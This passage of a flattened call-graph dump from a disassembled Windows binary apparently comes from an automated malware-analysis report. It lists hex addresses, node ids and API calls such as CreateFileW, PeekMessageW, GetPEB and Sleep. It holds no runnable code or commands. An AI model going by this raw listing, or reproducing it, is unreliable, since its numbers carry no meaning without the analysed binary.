96003->96004 96011 e26d7 96003->96011 96004->95985 96007 e2742 96006->96007 96008 e2731 96006->96008 
96007->95988 96009 9dbb3 65 API calls 96008->96009 96009->96007 96010->95985 96012 e2714 96011->96012 96013 e2703 96011->96013 96012->96003 96015 9dbb3 96013->96015 96016 9dbc1 96015->96016 96021 9dbdd 96015->96021 96017 9dbcd 96016->96017 96018 9dbe3 96016->96018 96016->96021 96027 9f2d9 20 API calls __dosmaperr 96017->96027 96024 9d9cc 96018->96024 96021->96012 96022 9dbd2 96028 a27ec 26 API calls pre_c_initialization 96022->96028 96029 9d97b 96024->96029 96027->96022 96028->96021 96030 9d987 ___DestructExceptionObject 96029->96030 96037 9918d EnterCriticalSection 96030->96037 96032 9d995 96038 9d9f4 96032->96038 96036 9d9b3 __fread_nolock 96037->96032 96039 a49a1 27 API calls 96038->96039 96040 9da09 96039->96040 96041 9da3a 62 API calls 96040->96041 96042 9da24 96041->96042 96043 a4a56 62 API calls 96042->96043 96044 9d9a2 96043->96044 96045 9d9c0 LeaveCriticalSection __fread_nolock 96044->96045 96045->96036 96046->95997 96048 9e60f 96047->96048 96049 9e624 96047->96049 96091 9f2d9 20 API calls __dosmaperr 96048->96091 96054 9e61f 96049->96054 96066 9dc0b 96049->96066 96051 9e614 96092 a27ec 26 API calls pre_c_initialization 96051->96092 96054->95999 96058 9d955 __fread_nolock 26 API calls 96059 9e646 96058->96059 96076 a862f 96059->96076 96063->95994 96064->96001 96065->96001 96067 9dc1f 96066->96067 96068 9dc23 96066->96068 96072 a4d7a 96067->96072 96068->96067 96069 9d955 __fread_nolock 26 API calls 96068->96069 96070 9dc43 96069->96070 96093 a59be 96070->96093 96073 a4d90 96072->96073 96074 9e640 96072->96074 96073->96074 96075 a29c8 _free 20 API calls 96073->96075 96074->96058 96075->96074 96077 a863e 96076->96077 96078 a8653 96076->96078 96216 9f2c6 20 API calls __dosmaperr 96077->96216 96080 a868e 96078->96080 96084 a867a 96078->96084 96218 9f2c6 20 API calls __dosmaperr 96080->96218 96081 a8643 96217 9f2d9 20 API calls __dosmaperr 96081->96217 96213 a8607 96084->96213 96085 a8693 96219 9f2d9 20 API calls __dosmaperr 96085->96219 96089 9e64c 96089->96054 
96091->96051 96092->96054 96094 a59ca ___DestructExceptionObject 96093->96094 96095 a59ea 96094->96095 96096 a59d2 96094->96096 96098 a5a88 96095->96098 96103 a5a1f 96095->96103 96172 9f2c6 20 API calls __dosmaperr 96096->96172 96177 9f2c6 20 API calls __dosmaperr 96098->96177 96099 a59d7 96173 9f2d9 20 API calls __dosmaperr 96099->96173 96102 a5a8d 96178 9f2d9 20 API calls __dosmaperr 96102->96178 96118 a5147 EnterCriticalSection 96103->96118 96106 a5a95 96107 a5a25 96109 a5a41 96107->96109 96110 a5a56 96107->96110 96174 9f2d9 20 API calls __dosmaperr 96109->96174 96119 a5aa9 96110->96119 96111 a59df __fread_nolock 96111->96067 96118->96107 96172->96099 96173->96111 96177->96102 96178->96106 96221 a8585 96213->96221 96216->96081 96217->96089 96218->96085 96222 a8591 ___DestructExceptionObject 96221->96222 96265 a8402 96270 a81be 96265->96270 96268 a842a 96275 a81ef try_get_first_available_module 96270->96275 96272 a83ee 96289 a27ec 26 API calls pre_c_initialization 96272->96289 96274 a8343 96274->96268 96282 b0984 96274->96282 96278 a8338 96275->96278 96285 98e0b 40 API calls 2 library calls 96275->96285 96277 a838c 96277->96278 96286 98e0b 40 API calls 2 library calls 96277->96286 96278->96274 96288 9f2d9 20 API calls __dosmaperr 96278->96288 96280 a83ab 96280->96278 96287 98e0b 40 API calls 2 library calls 96280->96287 96290 b0081 96282->96290 96284 b099f 96284->96268 96285->96277 96286->96280 96287->96278 96288->96272 96289->96274 96291 b008d ___DestructExceptionObject 96290->96291 96292 b009b 96291->96292 96295 b00d4 96291->96295 96347 9f2d9 20 API calls __dosmaperr 96292->96347 96294 b00a0 96348 a27ec 26 API calls pre_c_initialization 96294->96348 96301 b065b 96295->96301 96300 b00aa __fread_nolock 96300->96284 96302 b0678 96301->96302 96303 b068d 96302->96303 96304 b06a6 96302->96304 96364 9f2c6 20 API calls __dosmaperr 96303->96364 96350 a5221 96304->96350 96307 b0692 96365 9f2d9 20 API calls __dosmaperr 96307->96365 96308 b06ab 96309 b06cb 96308->96309 
96310 b06b4 96308->96310 96363 b039a CreateFileW 96309->96363 96366 9f2c6 20 API calls __dosmaperr 96310->96366 96314 b06b9 96367 9f2d9 20 API calls __dosmaperr 96314->96367 96316 b0781 GetFileType 96318 b078c GetLastError 96316->96318 96319 b07d3 96316->96319 96317 b0756 GetLastError 96369 9f2a3 20 API calls 2 library calls 96317->96369 96370 9f2a3 20 API calls 2 library calls 96318->96370 96372 a516a 21 API calls 3 library calls 96319->96372 96320 b0704 96320->96316 96320->96317 96368 b039a CreateFileW 96320->96368 96323 b079a CloseHandle 96323->96307 96325 b07c3 96323->96325 96371 9f2d9 20 API calls __dosmaperr 96325->96371 96327 b0749 96327->96316 96327->96317 96329 b07f4 96331 b0840 96329->96331 96373 b05ab 72 API calls 4 library calls 96329->96373 96330 b07c8 96330->96307 96335 b086d 96331->96335 96374 b014d 72 API calls 4 library calls 96331->96374 96334 b0866 96334->96335 96337 b087e 96334->96337 96336 a86ae __wsopen_s 29 API calls 96335->96336 96338 b00f8 96336->96338 96337->96338 96339 b08fc CloseHandle 96337->96339 96349 b0121 LeaveCriticalSection __wsopen_s 96338->96349 96375 b039a CreateFileW 96339->96375 96341 b0927 96342 b095d 96341->96342 96343 b0931 GetLastError 96341->96343 96342->96338 96376 9f2a3 20 API calls 2 library calls 96343->96376 96345 b093d 96377 a5333 21 API calls 3 library calls 96345->96377 96347->96294 96348->96300 96349->96300 96351 a522d ___DestructExceptionObject 96350->96351 96378 a2f5e EnterCriticalSection 96351->96378 96353 a5234 96354 a5259 96353->96354 96357 a52c7 EnterCriticalSection 96353->96357 96361 a527b 96353->96361 96382 a5000 96354->96382 96360 a52d4 LeaveCriticalSection 96357->96360 96357->96361 96359 a52a4 __fread_nolock 96359->96308 96360->96353 96379 a532a 96361->96379 96363->96320 96364->96307 96365->96338 96366->96314 96367->96307 96368->96327 96369->96307 96370->96323 96371->96330 96372->96329 96373->96331 96374->96334 96375->96341 96376->96345 96377->96342 96378->96353 96390 a2fa6 LeaveCriticalSection 
96379->96390 96381 a5331 96381->96359 96383 a4c7d CallUnexpected 20 API calls 96382->96383 96385 a5012 96383->96385 96384 a501f 96386 a29c8 _free 20 API calls 96384->96386 96385->96384 96391 a3405 11 API calls 2 library calls 96385->96391 96387 a5071 96386->96387 96387->96361 96389 a5147 EnterCriticalSection 96387->96389 96389->96361 96390->96381 96391->96385 96392 13923b0 96406 1390000 96392->96406 96394 139249f 96409 13922a0 96394->96409 96412 13934d0 GetPEB 96406->96412 96408 139068b 96408->96394 96410 13922a9 Sleep 96409->96410 96411 13922b7 96410->96411 96413 13934fa 96412->96413 96413->96408 96414 71cad SystemParametersInfoW 96415 7ddac 96418 7caf0 96415->96418 96417 7ddb7 96419 7cb69 96418->96419 96503 7cf89 96418->96503 96420 7cf73 96419->96420 96421 7cb8c 96419->96421 96541 8d336 40 API calls 96420->96541 96421->96503 96504 7bbe0 96421->96504 96425 c0ee7 96425->96425 96426 7cba7 96427 7cf10 96426->96427 96428 7cbf6 96426->96428 96437 c0abf 96426->96437 96438 7cd88 96426->96438 96426->96503 96540 7a81b 41 API calls 96427->96540 96429 7cc07 96428->96429 96430 c0b1a 96428->96430 96433 7ec40 235 API calls 96429->96433 96436 7ec40 235 API calls 96430->96436 96430->96503 96449 7cc1e 96433->96449 96439 c0b41 96436->96439 96437->96430 96485 7ce8b 96437->96485 96542 f79b6 235 API calls 96437->96542 96543 8a308 235 API calls 96437->96543 96537 7b567 39 API calls 96438->96537 96441 c0b51 96439->96441 96443 c0bbe 96439->96443 96464 c0b63 96439->96464 96439->96485 96440 7cde8 96451 c0daa 96440->96451 96452 7cdfe 96440->96452 96458 c0e4c 96440->96458 96440->96485 96557 7aceb 23 API calls messages 96441->96557 96442 7cc3a 96442->96503 96512 7ec40 96442->96512 96445 c0c0d 96443->96445 96447 c0bfb 96443->96447 96555 db59b 22 API calls 96443->96555 96559 f47d4 235 API calls 96445->96559 96558 79c6e 22 API calls 96447->96558 96448 c0e4a 96576 7289a 23 API calls 96448->96576 96449->96442 96449->96485 96449->96503 96560 7a8c7 96449->96560 96570 f4523 239 API calls 
___scrt_fastfail 96451->96570 96452->96448 96452->96458 96538 7b649 54 API calls 96452->96538 96574 f5705 23 API calls 96458->96574 96459 c0bb9 96556 7aceb 23 API calls messages 96459->96556 96461 7ce43 96461->96458 96465 c0e77 96461->96465 96539 7b649 54 API calls 96461->96539 96462 c0de7 96468 c0e35 96462->96468 96469 c0df5 96462->96469 96464->96447 96544 804f0 96464->96544 96575 7b649 54 API calls 96465->96575 96572 7aceb 23 API calls messages 96468->96572 96571 79c6e 22 API calls 96469->96571 96470 7cc82 96478 7ec40 235 API calls 96470->96478 96470->96485 96486 7ccb2 96470->96486 96471 c0ba8 96471->96447 96477 804f0 22 API calls 96471->96477 96474 7ce5f 96474->96448 96474->96458 96482 7ce84 96474->96482 96477->96459 96480 c0cc3 96478->96480 96479 c0e3e 96573 7aceb 23 API calls messages 96479->96573 96480->96485 96564 7aceb 23 API calls messages 96480->96564 96483 8fddb 22 API calls 96482->96483 96483->96485 96485->96417 96489 c0d06 96486->96489 96492 7ccf2 96486->96492 96487 c0d23 96567 8ad9c 39 API calls 96487->96567 96488 c0d19 96566 7b415 39 API calls 96488->96566 96489->96488 96565 8ad9c 39 API calls 96489->96565 96492->96427 96492->96487 96494 7cd2e 96492->96494 96492->96503 96494->96487 96495 7cd45 96494->96495 96497 7cd4a 96494->96497 96536 7b415 39 API calls 96495->96536 96498 7cd74 96497->96498 96500 c0d66 96497->96500 96498->96438 96498->96503 96499 c0d7a 96569 7b415 39 API calls 96499->96569 96500->96499 96568 8ad9c 39 API calls 96500->96568 96577 e359c 82 API calls __wsopen_s 96503->96577 96505 7be27 96504->96505 96510 7bbf3 96504->96510 96505->96426 96507 7a961 22 API calls 96507->96510 96508 7bc9d 96508->96426 96510->96507 96510->96508 96578 90242 5 API calls __Init_thread_wait 96510->96578 96579 900a3 29 API calls __onexit 96510->96579 96580 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96510->96580 96519 7ec76 messages 96512->96519 96513 90242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 
WaitForSingleObjectEx EnterCriticalSection 96513->96519 96514 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96514->96519 96515 c4beb 96586 e359c 82 API calls __wsopen_s 96515->96586 96516 8fddb 22 API calls 96516->96519 96518 7fef7 96525 7a8c7 22 API calls 96518->96525 96529 7ed9d messages 96518->96529 96519->96513 96519->96514 96519->96515 96519->96516 96519->96518 96521 c4b0b 96519->96521 96522 c4600 96519->96522 96526 7a8c7 22 API calls 96519->96526 96519->96529 96530 7a961 22 API calls 96519->96530 96531 7fbe3 96519->96531 96532 900a3 29 API calls pre_c_initialization 96519->96532 96535 7f3ae messages 96519->96535 96581 801e0 235 API calls 2 library calls 96519->96581 96582 806a0 41 API calls messages 96519->96582 96584 e359c 82 API calls __wsopen_s 96521->96584 96527 7a8c7 22 API calls 96522->96527 96522->96529 96525->96529 96526->96519 96527->96529 96529->96470 96530->96519 96531->96529 96533 c4bdc 96531->96533 96531->96535 96532->96519 96585 e359c 82 API calls __wsopen_s 96533->96585 96535->96529 96583 e359c 82 API calls __wsopen_s 96535->96583 96536->96497 96537->96440 96538->96461 96539->96474 96540->96438 96541->96503 96542->96437 96543->96437 96545 80502 96544->96545 96547 8050b 96545->96547 96593 8a732 22 API calls 96545->96593 96548 805c0 96547->96548 96549 8fddb 22 API calls 96547->96549 96548->96471 96550 80629 96549->96550 96551 8fddb 22 API calls 96550->96551 96552 80632 96551->96552 96587 79cb3 96552->96587 96555->96459 96556->96441 96557->96447 96558->96445 96559->96449 96561 7a8ea __fread_nolock 96560->96561 96562 7a8db 96560->96562 96561->96442 96562->96561 96563 8fe0b 22 API calls 96562->96563 96563->96561 96564->96486 96565->96488 96566->96487 96567->96497 96568->96499 96569->96503 96570->96462 96571->96485 96572->96479 96573->96448 96574->96465 96575->96448 96576->96485 96577->96425 96578->96510 96579->96510 96580->96510 96581->96519 96582->96519 96583->96529 96584->96529 96585->96515 96586->96529 
96588 79cc2 _wcslen 96587->96588 96589 8fe0b 22 API calls 96588->96589 96590 79cea __fread_nolock 96589->96590 96591 8fddb 22 API calls 96590->96591 96592 79d00 96591->96592 96592->96471 96593->96547 96594 c2a00 96609 7d7b0 messages 96594->96609 96595 7db11 PeekMessageW 96595->96609 96596 7d807 GetInputState 96596->96595 96596->96609 96597 c1cbe TranslateAcceleratorW 96597->96609 96599 7db8f PeekMessageW 96599->96609 96600 7da04 timeGetTime 96600->96609 96601 7db73 TranslateMessage DispatchMessageW 96601->96599 96602 7dbaf Sleep 96617 7dbc0 96602->96617 96603 c2b74 Sleep 96603->96617 96604 8e551 timeGetTime 96604->96617 96605 c1dda timeGetTime 96775 8e300 23 API calls 96605->96775 96608 c2c0b GetExitCodeProcess 96612 c2c37 CloseHandle 96608->96612 96613 c2c21 WaitForSingleObject 96608->96613 96609->96595 96609->96596 96609->96597 96609->96599 96609->96600 96609->96601 96609->96602 96609->96603 96609->96605 96614 7d9d5 96609->96614 96621 7ec40 235 API calls 96609->96621 96626 7dd50 96609->96626 96633 7dfd0 96609->96633 96656 81310 96609->96656 96712 8edf6 96609->96712 96717 7bf40 96609->96717 96776 e3a2a 23 API calls 96609->96776 96777 e359c 82 API calls __wsopen_s 96609->96777 96610 1029bf GetForegroundWindow 96610->96617 96612->96617 96613->96609 96613->96612 96615 c2a31 96615->96614 96616 c2ca9 Sleep 96616->96609 96617->96604 96617->96608 96617->96609 96617->96610 96617->96614 96617->96615 96617->96616 96778 f5658 23 API calls 96617->96778 96779 de97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96617->96779 96780 dd4dc 47 API calls 96617->96780 96621->96609 96627 7dd83 96626->96627 96628 7dd6f 96626->96628 96782 e359c 82 API calls __wsopen_s 96627->96782 96781 7d260 235 API calls 2 library calls 96628->96781 96631 7dd7a 96631->96609 96632 c2f75 96632->96632 96635 7e010 96633->96635 96634 7ec40 235 API calls 96651 7e0dc messages 96634->96651 96635->96651 96785 90242 5 API calls __Init_thread_wait 96635->96785 96638 c2fca 
96640 7a961 22 API calls 96638->96640 96638->96651 96639 7a961 22 API calls 96639->96651 96643 c2fe4 96640->96643 96786 900a3 29 API calls __onexit 96643->96786 96645 c2fee 96787 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96645->96787 96649 7a8c7 22 API calls 96649->96651 96650 804f0 22 API calls 96650->96651 96651->96634 96651->96639 96651->96649 96651->96650 96652 7e3e1 96651->96652 96653 e359c 82 API calls 96651->96653 96783 7a81b 41 API calls 96651->96783 96784 8a308 235 API calls 96651->96784 96788 90242 5 API calls __Init_thread_wait 96651->96788 96789 900a3 29 API calls __onexit 96651->96789 96790 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96651->96790 96791 f47d4 235 API calls 96651->96791 96792 f68c1 235 API calls 96651->96792 96652->96609 96653->96651 96657 817b0 96656->96657 96658 81376 96656->96658 96892 90242 5 API calls __Init_thread_wait 96657->96892 96660 81390 96658->96660 96661 c6331 96658->96661 96665 81940 9 API calls 96660->96665 96662 c633d 96661->96662 96897 f709c 235 API calls 96661->96897 96662->96609 96664 817ba 96666 817fb 96664->96666 96668 79cb3 22 API calls 96664->96668 96667 813a0 96665->96667 96671 c6346 96666->96671 96673 8182c 96666->96673 96669 81940 9 API calls 96667->96669 96677 817d4 96668->96677 96670 813b6 96669->96670 96670->96666 96672 813ec 96670->96672 96898 e359c 82 API calls __wsopen_s 96671->96898 96672->96671 96696 81408 __fread_nolock 96672->96696 96894 7aceb 23 API calls messages 96673->96894 96676 81839 96895 8d217 235 API calls 96676->96895 96893 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96677->96893 96680 c636e 96899 e359c 82 API calls __wsopen_s 96680->96899 96681 8152f 96683 8153c 96681->96683 96684 c63d1 96681->96684 96686 81940 9 API calls 96683->96686 96901 f5745 54 API calls _wcslen 96684->96901 96688 81549 96686->96688 96687 8fddb 22 API calls 96687->96696 96691 c64fa 96688->96691 96693 81940 9 API calls 96688->96693 96689 81872 
96896 8faeb 23 API calls 96689->96896 96690 8fe0b 22 API calls 96690->96696 96700 c6369 96691->96700 96902 e359c 82 API calls __wsopen_s 96691->96902 96698 81563 96693->96698 96695 7ec40 235 API calls 96695->96696 96696->96676 96696->96680 96696->96681 96696->96687 96696->96690 96696->96695 96697 c63b2 96696->96697 96696->96700 96900 e359c 82 API calls __wsopen_s 96697->96900 96698->96691 96701 7a8c7 22 API calls 96698->96701 96704 815c7 messages 96698->96704 96700->96609 96701->96704 96702 81940 9 API calls 96702->96704 96703 8171d 96703->96609 96704->96689 96704->96691 96704->96700 96704->96702 96705 8167b messages 96704->96705 96793 ef0ec 96704->96793 96802 e6ef1 96704->96802 96882 f959f 96704->96882 96885 dd4ce 96704->96885 96888 f958b 96704->96888 96705->96703 96891 8ce17 22 API calls messages 96705->96891 96714 8ee12 96712->96714 96715 8ee09 96712->96715 96713 8ee36 IsDialogMessageW 96713->96714 96713->96715 96714->96713 96714->96715 96716 cefaf GetClassLongW 96714->96716 96715->96609 96716->96713 96716->96714 97311 7adf0 96717->97311 96719 7bf9d 96720 c04b6 96719->96720 96721 7bfa9 96719->96721 97330 e359c 82 API calls __wsopen_s 96720->97330 96723 c04c6 96721->96723 96724 7c01e 96721->96724 97331 e359c 82 API calls __wsopen_s 96723->97331 97316 7ac91 96724->97316 96728 7c7da 96731 8fe0b 22 API calls 96728->96731 96736 7c808 __fread_nolock 96731->96736 96733 c04f5 96738 c055a 96733->96738 97332 8d217 235 API calls 96733->97332 96739 8fe0b 22 API calls 96736->96739 96737 7af8a 22 API calls 96759 7c039 __fread_nolock messages 96737->96759 96774 7c603 96738->96774 97333 e359c 82 API calls __wsopen_s 96738->97333 96763 7c350 __fread_nolock messages 96739->96763 96740 d7120 22 API calls 96740->96759 96741 c091a 97343 e3209 23 API calls 96741->97343 96744 7ec40 235 API calls 96744->96759 96745 c08a5 96746 7ec40 235 API calls 96745->96746 96748 c08cf 96746->96748 96748->96774 97341 7a81b 41 API calls 96748->97341 96749 c0591 97334 e359c 82 API calls __wsopen_s 
96749->97334 96750 c08f6 97342 e359c 82 API calls __wsopen_s 96750->97342 96755 7bbe0 40 API calls 96755->96759 96756 7c3ac 96756->96609 96757 7c237 96760 7c253 96757->96760 96761 7a8c7 22 API calls 96757->96761 96759->96728 96759->96733 96759->96736 96759->96737 96759->96738 96759->96740 96759->96741 96759->96744 96759->96745 96759->96749 96759->96750 96759->96755 96759->96757 96764 8fddb 22 API calls 96759->96764 96767 c09bf 96759->96767 96773 8fe0b 22 API calls 96759->96773 96759->96774 97320 7ad81 96759->97320 97335 d7099 22 API calls __fread_nolock 96759->97335 97336 f5745 54 API calls _wcslen 96759->97336 97337 8aa42 22 API calls messages 96759->97337 97338 df05c 40 API calls 96759->97338 97339 7a993 41 API calls 96759->97339 97340 7aceb 23 API calls messages 96759->97340 96762 c0976 96760->96762 96768 7c297 messages 96760->96768 96761->96760 97344 7aceb 23 API calls messages 96762->97344 96763->96756 97329 8ce17 22 API calls messages 96763->97329 96764->96759 96767->96774 97345 e359c 82 API calls __wsopen_s 96767->97345 96768->96767 97327 7aceb 23 API calls messages 96768->97327 96770 7c335 96770->96767 96771 7c342 96770->96771 97328 7a704 22 API calls messages 96771->97328 96773->96759 96774->96609 96775->96609 96776->96609 96777->96609 96778->96617 96779->96617 96780->96617 96781->96631 96782->96632 96783->96651 96784->96651 96785->96638 96786->96645 96787->96651 96788->96651 96789->96651 96790->96651 96791->96651 96792->96651 96903 77510 96793->96903 96797 ef136 96798 ef15b 96797->96798 96799 7ec40 235 API calls 96797->96799 96801 ef15f 96798->96801 96954 79c6e 22 API calls 96798->96954 96799->96798 96801->96704 96803 7a961 22 API calls 96802->96803 96804 e6f1d 96803->96804 96805 7a961 22 API calls 96804->96805 96806 e6f26 96805->96806 96807 e6f3a 96806->96807 97139 7b567 39 API calls 96806->97139 96809 77510 53 API calls 96807->96809 96810 e6f57 _wcslen 96809->96810 96811 e70bf 96810->96811 96812 e6fbc 96810->96812 96881 e70e9 96810->96881 96813 74ecb 94 
API calls 96811->96813 96814 77510 53 API calls 96812->96814 96815 e70d0 96813->96815 96816 e6fc8 96814->96816 96817 e70e5 96815->96817 96818 74ecb 94 API calls 96815->96818 96820 7a8c7 22 API calls 96816->96820 96822 e6fdb 96816->96822 96819 7a961 22 API calls 96817->96819 96817->96881 96818->96817 96821 e711a 96819->96821 96820->96822 96824 7a961 22 API calls 96821->96824 96823 e7027 96822->96823 96825 e7005 96822->96825 96828 7a8c7 22 API calls 96822->96828 96826 77510 53 API calls 96823->96826 96827 e7126 96824->96827 97140 733c6 96825->97140 96830 e7034 96826->96830 96831 7a961 22 API calls 96827->96831 96828->96825 96834 e703d 96830->96834 96835 e7047 96830->96835 96832 e712f 96831->96832 96837 7a961 22 API calls 96832->96837 96833 e700f 96838 77510 53 API calls 96833->96838 96839 7a8c7 22 API calls 96834->96839 97149 de199 GetFileAttributesW 96835->97149 96841 e7138 96837->96841 96842 e701b 96838->96842 96839->96835 96840 e7050 96843 e7063 96840->96843 96846 74c6d 22 API calls 96840->96846 96844 77510 53 API calls 96841->96844 96845 76350 22 API calls 96842->96845 96848 77510 53 API calls 96843->96848 96854 e7069 96843->96854 96847 e7145 96844->96847 96845->96823 96846->96843 96976 7525f 96847->96976 96850 e70a0 96848->96850 97150 dd076 57 API calls 96850->97150 96851 e7166 97018 74c6d 96851->97018 96854->96881 96856 e71a9 96857 7a8c7 22 API calls 96856->96857 96859 e71ba 96857->96859 96858 74c6d 22 API calls 96860 e7186 96858->96860 97021 76350 96859->97021 96860->96856 96863 76b57 22 API calls 96860->96863 96865 e719b 96863->96865 96864 76350 22 API calls 96866 e71d6 96864->96866 96867 76b57 22 API calls 96865->96867 96868 76350 22 API calls 96866->96868 96867->96856 96869 e71e4 96868->96869 96870 77510 53 API calls 96869->96870 96871 e71f0 96870->96871 97030 dd7bc 96871->97030 96873 e7201 96874 dd4ce 4 API calls 96873->96874 96875 e720b 96874->96875 96876 77510 53 API calls 96875->96876 96880 e7239 96875->96880 96877 e7229 96876->96877 97084 e2947 
96877->97084 96879 74f39 68 API calls 96879->96881 96880->96879 96881->96704 97195 f7f59 96882->97195 96884 f95af 96884->96704 97306 ddbbe lstrlenW 96885->97306 96889 f7f59 120 API calls 96888->96889 96890 f959b 96889->96890 96890->96704 96891->96705 96892->96664 96893->96666 96894->96676 96895->96689 96896->96689 96897->96662 96898->96700 96899->96700 96900->96700 96901->96698 96902->96700 96904 77525 96903->96904 96919 77522 96903->96919 96905 7752d 96904->96905 96906 7755b 96904->96906 96955 951c6 26 API calls 96905->96955 96908 b500f 96906->96908 96909 7756d 96906->96909 96916 b50f6 96906->96916 96920 8fe0b 22 API calls 96908->96920 96925 b5088 96908->96925 96956 8fb21 51 API calls 96909->96956 96910 7753d 96915 8fddb 22 API calls 96910->96915 96912 b510e 96912->96912 96917 77547 96915->96917 96958 95183 26 API calls 96916->96958 96918 79cb3 22 API calls 96917->96918 96918->96919 96926 79e90 96919->96926 96921 b5058 96920->96921 96922 8fddb 22 API calls 96921->96922 96923 b507f 96922->96923 96924 79cb3 22 API calls 96923->96924 96924->96925 96957 8fb21 51 API calls 96925->96957 96959 76270 96926->96959 96928 79fd2 96929 7a4a1 22 API calls 96928->96929 96930 79fec 96929->96930 96930->96797 96933 bf7c4 96974 d96e2 84 API calls __wsopen_s 96933->96974 96934 bf699 96942 8fddb 22 API calls 96934->96942 96935 7a405 96935->96930 96975 d96e2 84 API calls __wsopen_s 96935->96975 96937 7a4a1 22 API calls 96953 79eb5 96937->96953 96940 7a6c3 22 API calls 96940->96953 96941 bf7d2 96943 7a4a1 22 API calls 96941->96943 96944 bf754 96942->96944 96945 bf7e8 96943->96945 96946 8fe0b 22 API calls 96944->96946 96945->96930 96947 7a12c __fread_nolock 96946->96947 96947->96933 96947->96935 96950 7aec9 22 API calls 96951 7a0db CharUpperBuffW 96950->96951 96970 7a673 22 API calls 96951->96970 96953->96928 96953->96933 96953->96934 96953->96935 96953->96937 96953->96940 96953->96947 96953->96950 96964 74573 41 API calls _wcslen 96953->96964 96965 7a587 96953->96965 96971 748c8 23 API 
calls 96953->96971 96972 749bd 22 API calls __fread_nolock 96953->96972 96973 7a673 22 API calls 96953->96973 96954->96801 96955->96910 96956->96910 96957->96916 96958->96912 96960 8fe0b 22 API calls 96959->96960 96961 76295 96960->96961 96962 8fddb 22 API calls 96961->96962 96963 762a3 96962->96963 96963->96953 96964->96953 96966 7a59d 96965->96966 96969 7a598 __fread_nolock 96965->96969 96967 bf80f 96966->96967 96968 8fe0b 22 API calls 96966->96968 96968->96969 96969->96953 96970->96953 96971->96953 96972->96953 96973->96953 96974->96941 96975->96930 96977 7a961 22 API calls 96976->96977 96978 75275 96977->96978 96979 7a961 22 API calls 96978->96979 96980 7527d 96979->96980 96981 7a961 22 API calls 96980->96981 96982 75285 96981->96982 96983 7a961 22 API calls 96982->96983 96984 7528d 96983->96984 96985 752c1 96984->96985 96986 b3df5 96984->96986 96988 76d25 22 API calls 96985->96988 96987 7a8c7 22 API calls 96986->96987 96989 b3dfe 96987->96989 96990 752cf 96988->96990 96991 7a6c3 22 API calls 96989->96991 96992 793b2 22 API calls 96990->96992 96994 75304 96991->96994 96993 752d9 96992->96993 96993->96994 96995 76d25 22 API calls 96993->96995 96996 75349 96994->96996 96997 75325 96994->96997 96998 b3e20 96994->96998 97000 752fa 96995->97000 97151 76d25 96996->97151 96997->96996 97003 74c6d 22 API calls 96997->97003 97006 76b57 22 API calls 96998->97006 97002 793b2 22 API calls 97000->97002 97001 7535a 97004 75370 97001->97004 97008 7a8c7 22 API calls 97001->97008 97002->96994 97005 75332 97003->97005 97007 75384 97004->97007 97009 7a8c7 22 API calls 97004->97009 97005->96996 97010 76d25 22 API calls 97005->97010 97015 b3ee0 97006->97015 97011 7a8c7 22 API calls 97007->97011 97012 7538f 97007->97012 97008->97004 97009->97007 97010->96996 97011->97012 97013 7a8c7 22 API calls 97012->97013 97017 7539a 97012->97017 97013->97017 97014 74c6d 22 API calls 97014->97015 97015->96996 97015->97014 97164 749bd 22 API calls __fread_nolock 97015->97164 97017->96851 97019 
7aec9 22 API calls 97018->97019 97020 74c78 97019->97020 97020->96856 97020->96858 97022 76362 97021->97022 97023 b4a51 97021->97023 97166 76373 97022->97166 97176 74a88 22 API calls __fread_nolock 97023->97176 97026 7636e 97026->96864 97027 b4a5b 97028 b4a67 97027->97028 97029 7a8c7 22 API calls 97027->97029 97029->97028 97031 dd7d8 97030->97031 97032 dd7dd 97031->97032 97033 dd7f3 97031->97033 97034 dd7ee 97032->97034 97036 7a8c7 22 API calls 97032->97036 97035 7a961 22 API calls 97033->97035 97034->96873 97037 dd7fb 97035->97037 97036->97034 97038 7a961 22 API calls 97037->97038 97039 dd803 97038->97039 97040 7a961 22 API calls 97039->97040 97041 dd80e 97040->97041 97042 7a961 22 API calls 97041->97042 97043 dd816 97042->97043 97044 7a961 22 API calls 97043->97044 97045 dd81e 97044->97045 97046 7a961 22 API calls 97045->97046 97047 dd826 97046->97047 97048 7a961 22 API calls 97047->97048 97049 dd82e 97048->97049 97050 7a961 22 API calls 97049->97050 97051 dd836 97050->97051 97052 7525f 22 API calls 97051->97052 97053 dd84d 97052->97053 97054 7525f 22 API calls 97053->97054 97055 dd866 97054->97055 97056 74c6d 22 API calls 97055->97056 97057 dd872 97056->97057 97058 dd885 97057->97058 97059 793b2 22 API calls 97057->97059 97060 74c6d 22 API calls 97058->97060 97059->97058 97061 dd88e 97060->97061 97062 dd89e 97061->97062 97063 793b2 22 API calls 97061->97063 97064 dd8b0 97062->97064 97065 7a8c7 22 API calls 97062->97065 97063->97062 97066 76350 22 API calls 97064->97066 97065->97064 97067 dd8bb 97066->97067 97177 dd978 22 API calls 97067->97177 97069 dd8ca 97178 dd978 22 API calls 97069->97178 97071 dd8dd 97072 74c6d 22 API calls 97071->97072 97073 dd8e7 97072->97073 97074 dd8ec 97073->97074 97075 dd8fe 97073->97075 97076 733c6 22 API calls 97074->97076 97077 74c6d 22 API calls 97075->97077 97078 dd8f9 97076->97078 97079 dd907 97077->97079 97081 76350 22 API calls 97078->97081 97080 dd925 97079->97080 97083 733c6 22 API calls 97079->97083 97082 76350 22 API calls 
